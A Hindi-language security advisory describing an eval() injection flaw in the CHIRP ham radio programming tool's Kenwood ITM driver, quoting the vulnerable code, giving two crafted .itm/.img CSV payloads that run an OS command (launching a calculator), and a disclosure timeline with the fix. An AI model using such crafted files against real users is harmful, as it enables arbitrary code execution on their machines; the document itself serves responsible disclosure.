
हैम रेडियो प्रोग्रामिंग एप्लिकेशन में eval() इंजेक्शन के माध्यम से मनमाना कोड निष्पादन (arbitrary code execution) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जिसमें दुर्भावनापूर्ण .itm/.img फ़ाइल पेलोड और मूल कारण विश्लेषण (root-cause analysis) शामिल हैं।
eval() के माध्यम से मनमाना कोड निष्पादनउत्पाद: CHIRP - हैम रेडियो प्रोग्रामिंग के लिए एक ओपन-सोर्स परियोजना।
प्रभावित संस्करण:
URL: https://github.com/kk7ds/chirp, https://chirpmyradio.com
प्रभावित संस्करण: <= chirp-next-20260814
CWE: CWE-95 (Eval Injection)
CHIRP का केनवुड ITM फ़ाइल प्रारूप ड्राइवर किसी खोली गई फ़ाइल से कच्चे CSV फ़ील्ड मानों को बिना किसी सत्यापन के सीधे Python के अंतर्निहित eval() को भेजता है। एक हमलावर जो CHIRP उपयोगकर्ता को एक विशेष रूप से तैयार फ़ाइल वितरित करता है, वह पीड़ित उपयोगकर्ता के रूप में मनमाना कोड निष्पादन प्राप्त करता है।
chirp/drivers/kenwood_itm.py, _clean_tmode(), पंक्तियाँ 66–67:
def _clean_tmode(self, headers, line, mem):
rtone = eval(generic_csv.get_datum_by_header(headers, line, "TXSIG")) # SINK
ctone = eval(generic_csv.get_datum_by_header(headers, line, "RXSIG")) # SINK
TXSIG और RXSIG मान सीधे खोली गई फ़ाइल की CSV पंक्ति से आते हैं। eval() से पहले कोई प्रकार जाँच, अनुमति सूची, या सैंडबॉक्सिंग लागू नहीं की जाती।
नीचे दो POCs दिए गए हैं।
.itm// Malicious .itm POC
CH,ZN,RXF,TXF,NAME,TXSIG,RXSIG
1,1,146.520000,146.520000,PoC,__import__('os').system('calc'),0
.img// Malicious .img POC
CH,ZN,RXF,TXF,NAME,TXSIG,RXSIG
1,0,146520000,146520000,PoC,__import__('os').system('calc.exe'),0
chirpεimgeyJyY2xhc3MiOiAiSVRNUmFkaW8iLCAidmVuZG9yIjogIktlbndvb2QiLCAibW9kZWwiOiAiSVRNIiwgInZhcmlhbnQiOiAiIiwgImNoaXJwX3ZlcnNpb24iOiAiZGFpbHktMjAyMzAxMDEifQ==
{file_name}.img चुनें। यदि .itm पेलोड का उपयोग कर रहे हैं, तो फ़िल्टर ड्रॉपडाउन को "All Files" में बदलें (CHIRP में ITM के लिए कोई फ़िल्टर नहीं है)।{file_name}.itm चुनें।2026-08-17 -- भेद्यता की खोज की गई
2026-08-17 -- अनुरक्षक को ईमेल किया गया
2026-08-17 -- अनुरक्षक ने उत्तर दिया और उसी दिन कोड ठीक कर दिया। https://github.com/kk7ds/chirp/commit/39178dbfc4fece083ab9ed20286d6ae3a91a718e
2026-08-21 -- इंस्टॉलर रिलीज़ 20260821 में यह सुधार शामिल है।